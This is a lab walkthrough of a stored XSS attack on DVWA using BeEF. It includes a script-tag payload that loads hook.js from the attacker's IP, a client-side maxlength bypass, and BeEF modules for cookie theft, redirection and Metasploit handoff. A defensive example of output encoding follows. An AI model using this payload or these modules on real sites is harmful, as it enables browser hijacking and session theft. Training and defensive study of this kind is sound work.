
XSS using BeEF

Today we will perform a stored cross-site scripting (XSS) attack using a tool called BeEF. In stored XSS, the attacker finds a target web application that is not only vulnerable to XSS but also stores the injected code, e.g. a feedback form that saves the text entered into it and shows it to later visitors. So we try such forms or textboxes in the web application. See the figure.

Fig. Stored Cross Site Scripting Attack

Here, the attacker finds an XSS-vulnerable page that accepts and stores data or text from users, and infects it by injecting a script. When another, normal user visits that web page, the malicious script is executed in that user's browser, with everything the page itself is allowed to do in that origin. The attacker can hijack the user's session, deface the page or redirect the user to another site. A tool known as BeEF, the Browser Exploitation Framework, can be used to control the victim's browser.



Deliverable:


Lab Set up

  • Virtualization using Oracle VirtualBox

  • Attacker's System: Kali Linux

  • Target 1 System: Metasploitable 2

  • Target 2 System: any computer or mobile device with a web browser (e.g. Windows 7)


1. In Kali Linux, open the browser and visit the target website.

E.g. DVWA (Damn Vulnerable Web Application), which is included in Metasploitable 2. Enter the target's IP address in the Kali Linux browser and click on DVWA. Log in with username 'admin' and password 'password'. Then go to DVWA Security, set the security level to 'low' and submit. This is done so that the attack works: at this level the application stores and displays what users enter without encoding it.




2. Click on the 'XSS stored' tab. Here you will find a guestbook for leaving feedback, with two textboxes: name and message. Try entering some normal text; you will see that your input is stored and an entry is created for it. Now try entering a simple XSS alert-box script. Anyone who visits this web page afterwards will have that script run in their browser. But now we are going to see how to automate this and get the victim's browser completely under our control using BeEF, the Browser Exploitation Framework.



3. Start BeEF.

In Kali Linux --> Applications --> Kali Linux --> Exploitation Tools --> BeEF XSS Framework --> beef


This starts BeEF and opens its web interface in the Kali Linux browser at the URL


127.0.0.1:3000/ui/authentication



4. Replace 127.0.0.1 in that URL with the IP address of your Kali Linux machine and press Enter. The hook URL handed out in step 7 must be reachable from the victim, so use the address the victim can reach, not the loopback address. Your new URL will look like this:


Ex. 192.168.0.105:3000/ui/authentication



5. You will see the BeEF authentication page. Log in with the username beef and password beef (BeEF's default credentials on the Kali version used here).



6. Now copy the panel URL, e.g. 192.168.0.105:3000/ui/panel, paste it into a new tab, replace 'ui/panel' with 'hook.js' and press Enter. The browser shows the JavaScript of the hook; this is the script that will run in the victim's browser and connect it back to BeEF.


Ex. 192.168.0.105:3000/hook.js



7. Copy the above URL and paste it into the message textbox of the 'XSS stored' page inside a <script> tag, as follows:


<script src="http://192.168.0.105:3000/hook.js"></script>


Note: the web page may not let you type the whole script, because the developer set the maximum length of the message textbox to 50 characters and the script above is longer than that. This is only a client-side restriction, so you can bypass it as follows:


Right-click on the textbox, choose 'Inspect element' and change the 'maxlength' attribute to a larger value, e.g. 500. Since the limit is enforced only by the browser, the server accepts the longer message unchanged.


Now enter the script again and click 'Sign Guestbook'. You will see that an entry is added, but the message part of that entry appears empty: the browser parsed the stored <script> tag as markup instead of displaying it as text, which is exactly the vulnerability. Done!



8. Now open that web page from another system (e.g. Windows 7). Any browser that visits the vulnerable page loads hook.js and appears, with its IP address, under 'Online Browsers' in the attacker's BeEF panel at 192.168.0.105:3000/ui/panel



9. Now go to the Commands tab in the BeEF panel. You will find a number of command modules that can be run in the victim's browser from BeEF on Kali Linux. The victim's browser is under the attacker's control: you can redirect it, deface the page, execute scripts, play a sound, read the session cookies, or even hand the browser over to Metasploit. Two caveats: the commands run with the privileges of the hooked page's origin only, so cookies marked HttpOnly are not readable by the cookie module, and the browser stays hooked only while the victim keeps the page open; once the tab is closed or navigates away, it moves to the offline list.
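As an added illustration that is not part of this lab and is not DVWA's or BeEF's own code: a minimal guestbook in JavaScript (Node.js) that stores and renders entries the way the 'XSS stored' page does at security level 'low', placed beside a hardened version. It shows why the maxlength bypass in step 7 works (the length limit lived only in the browser) and why the real fix is output encoding rather than length limits. The function names (storeEntryVulnerable, storeEntryHardened, renderVulnerable, renderHardened, escapeHtml, containsHook), the 10/50 character limits and the guestbook data are this example's own assumptions; the hook URL is the one used in the steps above.

```javascript
// Added example, not code from the lab, DVWA or BeEF. Names and limits are assumptions.
const MAX_NAME_LEN = 10;     // assumed limits; the page only tells us the message box had maxlength 50
const MAX_MESSAGE_LEN = 50;

// Constructed sample input: the payload from step 7 of the lab.
const HOOK_URL = "http://192.168.0.105:3000/hook.js";
const attackerMessage = `<script src="${HOOK_URL}"></script>`; // 57 chars, longer than maxlength=50

// HTML-encode the five characters that let text break out of an HTML text node or attribute.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable store: trusts the form. The browser's maxlength was the only length check,
// so once the attacker edits it away in the inspector, the full payload is persisted.
function storeEntryVulnerable(db, name, message) {
  db.push({ name, message });
  return true;
}

// Hardened store: enforces the limits on the server. A client-side maxlength is advisory;
// anything the browser does can be changed by the person running the browser.
function storeEntryHardened(db, name, message) {
  if (typeof name !== "string" || typeof message !== "string") return false;
  if (name.length === 0 || name.length > MAX_NAME_LEN) return false;
  if (message.length === 0 || message.length > MAX_MESSAGE_LEN) return false;
  db.push({ name, message });
  return true;
}

// Vulnerable render: concatenates stored text straight into the page. This is the stored XSS:
// every later visitor's browser parses the <script> tag and loads the BeEF hook.
function renderVulnerable(db) {
  return db
    .map((e) => `<div class="entry">Name: ${e.name}<br>Message: ${e.message}</div>`)
    .join("\n");
}

// Hardened render: encodes stored text at output time, so the same stored string is shown
// as literal characters instead of being parsed as markup.
function renderHardened(db) {
  return db
    .map((e) => `<div class="entry">Name: ${escapeHtml(e.name)}<br>Message: ${escapeHtml(e.message)}</div>`)
    .join("\n");
}

// Does the rendered page contain a script tag whose src loads hook.js?
function containsHook(html) {
  return /<script[^>]*src=["']?[^"'>]*hook\.js/i.test(html);
}

// Run the attacker's submission through both versions and report what each visitor would get.
function demo() {
  const vulnDb = [];
  const hardDb = [];
  const acceptedByVuln = storeEntryVulnerable(vulnDb, "attacker", attackerMessage);
  const acceptedByHard = storeEntryHardened(hardDb, "attacker", attackerMessage);
  // Even if a hardened app had accepted the text (say, with a bigger limit), output encoding
  // alone neutralises it, which is why encoding and not the length check is the real defence.
  const hardDbWithPayload = [{ name: "attacker", message: attackerMessage }];
  return {
    payloadLength: attackerMessage.length,
    acceptedByVuln,
    acceptedByHard,
    vulnerableHtmlHooked: containsHook(renderVulnerable(vulnDb)),
    hardenedHtmlHooked: containsHook(renderHardened(hardDbWithPayload)),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The payload is 57 characters, which is why the 50-character maxlength got in the way in step 7 and why lifting it in the inspector was enough: the vulnerable store never re-checks the length, and the vulnerable render hands the stored `<script>` tag to every visitor's browser unchanged. In the hardened version the entry is rejected on the server, and even an entry that did get stored would be displayed as text, so no hook is loaded.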

